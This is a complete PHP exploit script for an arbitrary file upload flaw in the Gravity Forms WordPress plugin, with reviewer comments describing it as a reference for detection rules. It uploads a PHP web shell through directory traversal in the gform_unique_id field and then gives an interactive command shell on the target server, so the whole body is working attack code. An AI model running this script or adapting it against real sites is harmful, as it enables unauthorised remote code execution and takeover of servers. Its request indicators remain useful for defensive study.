<?php
/****************************************************************************************************************************
 *
 * Exploit Title: Gravity Forms [WP] - Arbitrary File Upload
 * Vulnerable Version(s): 1.8.19 (and below)
 * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
 * Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
 *
 *****************************************************************************************************************************/

// NOTE(review): proof-of-concept for the historical Gravity Forms upload bug named in the
// header. Read it as a reference for what the malicious request looks like (useful for
// WAF rules and access-log searches), not as a maintained tool. CLI script: $argv[1] is
// the target's base URL.

// Silences every PHP notice and warning, including the undefined-variable notice for
// $testCom on the first loop pass and any failure from curl_exec()/file_get_contents().
error_reporting(0);

// ASCII-art banner. String kept byte-identical; the <code>/</code> fragments inside it
// look like an artefact of how this listing was extracted, not original content — unverified.
echo " _____ _ _ _______ _ / ____| (_) | |____|| | | | |__ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ | | |_ | '__/ _<code> \ \ / / | __| | | |__/ _</code> | | / __| | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \ \_____|_|\__,_| \_/ |_|\__|\__, |_|\__,_|_|_|___/ __/ | |___/ > an Exploiter by AnonGuy\n";

// Target base URL; falls back to a local WordPress install when no argument is given.
// '@' suppresses the undefined-index notice when $argv[1] is absent.
$domain= (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
// Gravity Forms' upload endpoint, reached through the gf_page query parameter.
$url = "$domain/?gf_page=upload";
// Where this script expects the uploaded file to have landed after the traversal below;
// the path is asserted, not reported by the server.
$shell = "$domain/wp-content/_input_3_khan.php5";
$separator = '-------------------------------------------------------------------';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
// Raw POST body. Its notable parts, which are also the indicators a defender can match on:
//   - name=khan.php5: an upload name with a PHP-executable extension
//   - gform_unique_id=../../../../: directory-traversal sequences in a field that should
//     only ever hold an identifier
//   - a PHP stub as the leading body segment
// Any POST to ?gf_page=upload carrying "../" in gform_unique_id, or a script extension in
// name, is this request shape. Unauthenticated access to the endpoint is the underlying
// issue per the header's write-up (not verifiable from this file).
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// The only "vulnerable" test is the substring "ok" (with quotes) anywhere in the reply.
// NOTE(review): a false curl_exec() result also fails this test, so network errors are
// reported as "doesn't seem to be vulnerable".
if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    // Interactive loop. Each request wraps its output in '~' markers so that
    // get_string_between() below can cut it out of whatever else the page returns.
    // NOTE(review): $testCom is unset on the first pass; null != 'exit' is true, so the
    // loop is entered, and error_reporting(0) above hides the notice.
    while ($testCom != 'exit') {
        $user= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
        $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
        echo "$user@$b0x:~$ ";
        // stdin is reopened on every iteration rather than once before the loop.
        $handle= fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        // NOTE(review): the input is sent before the loop condition is re-checked, so
        // typing 'exit' still produces one more request.
        $comOut= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
} else {
    die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}

/**
 * Returns the text of $string that sits between the first occurrence of $start and the
 * next occurrence of $end after it; '' when $start is not found.
 *
 * A space is prepended so that a $start match at offset 0 becomes offset 1 and cannot
 * collide with strpos()'s false, which the loose `== 0` test below treats as "not found".
 *
 * NOTE(review): when $end is absent, strpos() returns false, $len becomes negative
 * (0 - $ini), and substr() then drops that many characters from the tail instead of
 * signalling an error.
 */
function get_string_between($string, $start, $end) { # stolen from stackoverflow!
    $string = ' ' . $string;
    $ini= strpos($string, $start);
    // false == 0 under loose comparison; a genuine 0 cannot occur because of the prepended space.
    if ($ini == 0) return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>